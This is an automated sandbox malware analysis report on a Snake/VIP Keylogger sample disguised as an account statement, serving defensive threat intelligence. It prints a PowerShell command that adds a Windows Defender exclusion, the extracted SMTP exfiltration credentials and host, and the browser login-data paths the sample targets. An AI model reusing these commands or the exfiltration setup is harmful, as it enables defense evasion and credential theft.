Edit tour

Windows Analysis Report
[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Overview

General Information

Sample name:	[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Analysis ID:	1620673
MD5:	8dffb651c06ea1e66e1a006c4e22d916
SHA1:	1f4847423be89cb1929a6ae13ae22c17b8a65c6f
SHA256:	9c97162ae48aca365e6dc2e733af007bef8b6aaec168dac76216abe4b414ae15
Tags:	exeuser-MAM
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains very large strings

Adds a directory exclusion to Windows Defender

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Modifies the context of a thread in another process (thread injection)

Sample uses string decryption to hide its real strings

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe (PID: 4676 cmdline: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe" MD5: 8DFFB651C06EA1E66E1A006C4E22D916)

powershell.exe (PID: 5596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe (PID: 5312 cmdline: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe" MD5: 8DFFB651C06EA1E66E1A006C4E22D916)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.4612177769.0000000003C10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000005.00000002.4620006344.0000000140002000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d6aa:$a1: get_encryptedPassword 0x2d9c3:$a2: get_encryptedUsername 0x2d4c8:$a3: get_timePasswordChanged 0x2d5c3:$a4: get_passwordField 0x2d6c0:$a5: set_encryptedPassword 0x2ed60:$a7: get_logins 0x2ecc3:$a10: KeyLoggerEventArgs 0x2e92a:$a11: KeyLoggerEventArgsEventHandler
00000005.00000002.4612177769.0000000003AD1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xbecb2:$a1: get_encryptedPassword 0x101ef2:$a1: get_encryptedPassword 0x144f2a:$a1: get_encryptedPassword 0xbefcb:$a2: get_encryptedUsername 0x10220b:$a2: get_encryptedUsername 0x145243:$a2: get_encryptedUsername 0xbead0:$a3: get_timePasswordChanged 0x101d10:$a3: get_timePasswordChanged 0x144d48:$a3: get_timePasswordChanged 0xbebcb:$a4: get_passwordField 0x101e0b:$a4: get_passwordField 0x144e43:$a4: get_passwordField 0xbecc8:$a5: set_encryptedPassword 0x101f08:$a5: set_encryptedPassword 0x144f40:$a5: set_encryptedPassword 0xc0368:$a7: get_logins 0x1035a8:$a7: get_logins 0x1465e0:$a7: get_logins 0xc02cb:$a10: KeyLoggerEventArgs 0x10350b:$a10: KeyLoggerEventArgs 0x146543:$a10: KeyLoggerEventArgs
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 4676	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x89868:$a1: get_encryptedPassword 0x89b77:$a2: get_encryptedUsername 0x89690:$a3: get_timePasswordChanged 0x8978b:$a4: get_passwordField 0x8987e:$a5: set_encryptedPassword 0x8bd14:$a7: get_logins 0x8bc77:$a10: KeyLoggerEventArgs 0x8b8e2:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe PID: 5312	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1d2201:$a1: get_encryptedPassword 0x1d2510:$a2: get_encryptedUsername 0x1d2029:$a3: get_timePasswordChanged 0x1d2124:$a4: get_passwordField 0x1d2217:$a5: set_encryptedPassword 0x1d46ad:$a7: get_logins 0x1d4610:$a10: KeyLoggerEventArgs 0x1d427b:$a11: KeyLoggerEventArgsEventHandler
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2baaa:$a1: get_encryptedPassword 0x2bdc3:$a2: get_encryptedUsername 0x2b8c8:$a3: get_timePasswordChanged 0x2b9c3:$a4: get_passwordField 0x2bac0:$a5: set_encryptedPassword 0x2d160:$a7: get_logins 0x2d0c3:$a10: KeyLoggerEventArgs 0x2cd2a:$a11: KeyLoggerEventArgsEventHandler
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39894:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38f37:$a3: \Google\Chrome\User Data\Default\Login Data 0x39194:$a4: \Orbitum\User Data\Default\Login Data 0x39b73:$a5: \Kometa\User Data\Default\Login Data
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c6c0:$s1: UnHook 0x2c6c7:$s2: SetHook 0x2c6cf:$s3: CallNextHook 0x2c6dc:$s4: _hook
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8aa:$a1: get_encryptedPassword 0x2dbc3:$a2: get_encryptedUsername 0x2d6c8:$a3: get_timePasswordChanged 0x2d7c3:$a4: get_passwordField 0x2d8c0:$a5: set_encryptedPassword 0x2ef60:$a7: get_logins 0x2eec3:$a10: KeyLoggerEventArgs 0x2eb2a:$a11: KeyLoggerEventArgsEventHandler
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b694:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ad37:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af94:$a4: \Orbitum\User Data\Default\Login Data 0x3b973:$a5: \Kometa\User Data\Default\Login Data
5.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.140000000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4c0:$s1: UnHook 0x2e4c7:$s2: SetHook 0x2e4cf:$s3: CallNextHook 0x2e4dc:$s4: _hook
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2baaa:$a1: get_encryptedPassword 0x2bdc3:$a2: get_encryptedUsername 0x2b8c8:$a3: get_timePasswordChanged 0x2b9c3:$a4: get_passwordField 0x2bac0:$a5: set_encryptedPassword 0x2d160:$a7: get_logins 0x2d0c3:$a10: KeyLoggerEventArgs 0x2cd2a:$a11: KeyLoggerEventArgsEventHandler
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x39894:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38f37:$a3: \Google\Chrome\User Data\Default\Login Data 0x39194:$a4: \Orbitum\User Data\Default\Login Data 0x39b73:$a5: \Kometa\User Data\Default\Login Data
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c6c0:$s1: UnHook 0x2c6c7:$s2: SetHook 0x2c6cf:$s3: CallNextHook 0x2c6dc:$s4: _hook
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8aa:$a1: get_encryptedPassword 0x708e2:$a1: get_encryptedPassword 0x2dbc3:$a2: get_encryptedUsername 0x70bfb:$a2: get_encryptedUsername 0x2d6c8:$a3: get_timePasswordChanged 0x70700:$a3: get_timePasswordChanged 0x2d7c3:$a4: get_passwordField 0x707fb:$a4: get_passwordField 0x2d8c0:$a5: set_encryptedPassword 0x708f8:$a5: set_encryptedPassword 0x2ef60:$a7: get_logins 0x71f98:$a7: get_logins 0x2eec3:$a10: KeyLoggerEventArgs 0x71efb:$a10: KeyLoggerEventArgs 0x2eb2a:$a11: KeyLoggerEventArgsEventHandler 0x71b62:$a11: KeyLoggerEventArgsEventHandler
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b694:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e6cc:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ad37:$a3: \Google\Chrome\User Data\Default\Login Data 0x7dd6f:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af94:$a4: \Orbitum\User Data\Default\Login Data 0x7dfcc:$a4: \Orbitum\User Data\Default\Login Data 0x3b973:$a5: \Kometa\User Data\Default\Login Data 0x7e9ab:$a5: \Kometa\User Data\Default\Login Data
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4c0:$s1: UnHook 0x714f8:$s1: UnHook 0x2e4c7:$s2: SetHook 0x714ff:$s2: SetHook 0x2e4cf:$s3: CallNextHook 0x71507:$s3: CallNextHook 0x2e4dc:$s4: _hook 0x71514:$s4: _hook
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d8aa:$a1: get_encryptedPassword 0x70aea:$a1: get_encryptedPassword 0xb3b22:$a1: get_encryptedPassword 0x2dbc3:$a2: get_encryptedUsername 0x70e03:$a2: get_encryptedUsername 0xb3e3b:$a2: get_encryptedUsername 0x2d6c8:$a3: get_timePasswordChanged 0x70908:$a3: get_timePasswordChanged 0xb3940:$a3: get_timePasswordChanged 0x2d7c3:$a4: get_passwordField 0x70a03:$a4: get_passwordField 0xb3a3b:$a4: get_passwordField 0x2d8c0:$a5: set_encryptedPassword 0x70b00:$a5: set_encryptedPassword 0xb3b38:$a5: set_encryptedPassword 0x2ef60:$a7: get_logins 0x721a0:$a7: get_logins 0xb51d8:$a7: get_logins 0x2eec3:$a10: KeyLoggerEventArgs 0x72103:$a10: KeyLoggerEventArgs 0xb513b:$a10: KeyLoggerEventArgs
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b694:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e8d4:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc190c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ad37:$a3: \Google\Chrome\User Data\Default\Login Data 0x7df77:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0faf:$a3: \Google\Chrome\User Data\Default\Login Data 0x3af94:$a4: \Orbitum\User Data\Default\Login Data 0x7e1d4:$a4: \Orbitum\User Data\Default\Login Data 0xc120c:$a4: \Orbitum\User Data\Default\Login Data 0x3b973:$a5: \Kometa\User Data\Default\Login Data 0x7ebb3:$a5: \Kometa\User Data\Default\Login Data 0xc1beb:$a5: \Kometa\User Data\Default\Login Data
0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.14888408.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e4c0:$s1: UnHook 0x71700:$s1: UnHook 0xb4738:$s1: UnHook 0x2e4c7:$s2: SetHook 0x71707:$s2: SetHook 0xb473f:$s2: SetHook 0x2e4cf:$s3: CallNextHook 0x7170f:$s3: CallNextHook 0xb4747:$s3: CallNextHook 0x2e4dc:$s4: _hook 0x7171c:$s4: _hook 0xb4754:$s4: _hook
Click to see the 25 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ParentImage: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ParentProcessId: 4676, ParentProcessName: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ProcessId: 5596, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ParentImage: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ParentProcessId: 4676, ParentProcessName: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe", ProcessId: 5596, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:12:25.536268+0100	2803305	3	Unknown Traffic	192.168.2.5	49729	104.21.96.1	443	TCP
2025-02-21T07:12:26.784067+0100	2803305	3	Unknown Traffic	192.168.2.5	49733	104.21.96.1	443	TCP
2025-02-21T07:12:28.041444+0100	2803305	3	Unknown Traffic	192.168.2.5	49743	104.21.96.1	443	TCP
2025-02-21T07:12:29.300294+0100	2803305	3	Unknown Traffic	192.168.2.5	49754	104.21.96.1	443	TCP
2025-02-21T07:12:30.553194+0100	2803305	3	Unknown Traffic	192.168.2.5	49763	104.21.96.1	443	TCP
2025-02-21T07:12:33.937013+0100	2803305	3	Unknown Traffic	192.168.2.5	49782	104.21.96.1	443	TCP
2025-02-21T07:12:35.209375+0100	2803305	3	Unknown Traffic	192.168.2.5	49795	104.21.96.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:12:24.019115+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	193.122.6.168	80	TCP
2025-02-21T07:12:24.987880+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	193.122.6.168	80	TCP
2025-02-21T07:12:26.225854+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49730	193.122.6.168	80	TCP
2025-02-21T07:12:27.503504+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49737	193.122.6.168	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-21T07:12:36.114549+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49801	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587"}
Source: 00000000.00000002.2211317194.00000000147F7000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "infocff@fairpsb.com", "Password": "x]7gRoyV8T]y", "Host": "mail.fairpsb.com", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Virustotal: Detection: 22%			Perma Link
Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	ReversingLabs: Detection: 18%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: infocff@fairpsb.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: x]7gRoyV8T]y
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: mail.fairpsb.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: indexforwarder@gmail.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: 587
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor:
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: infocff@fairpsb.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: x]7gRoyV8T]y
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: mail.fairpsb.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: indexforwarder@gmail.com
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor: 587
Source: 0.2.[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe.148cb648.5.raw.unpack	String decryptor:

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown	HTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:49726 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.5:49782 -> 104.21.96.1:443 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49801 version: TLS 1.2

Source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: Gcz.pdb source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe
Source:	Binary string: Gcz.pdbSHA256KA source: [ID] Statement of Accounts-XXXXX4250-200220252003060444.exe

Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CEBE00h	5_2_00007FF848CEBA93
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CE95B4h	5_2_00007FF848CE93A2
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CEB80Dh	5_2_00007FF848CEB47D
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CE91F9h	5_2_00007FF848CE874D
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CEBE00h	5_2_00007FF848CEBD1C
Source: C:\Users\user\Desktop\[ID] Statement of Accounts-XXXXX4250-200220252003060444.exe	Code function: 4x nop then jmp 00007FF848CEA060h	5_2_00007FF848CE972F

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49801 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
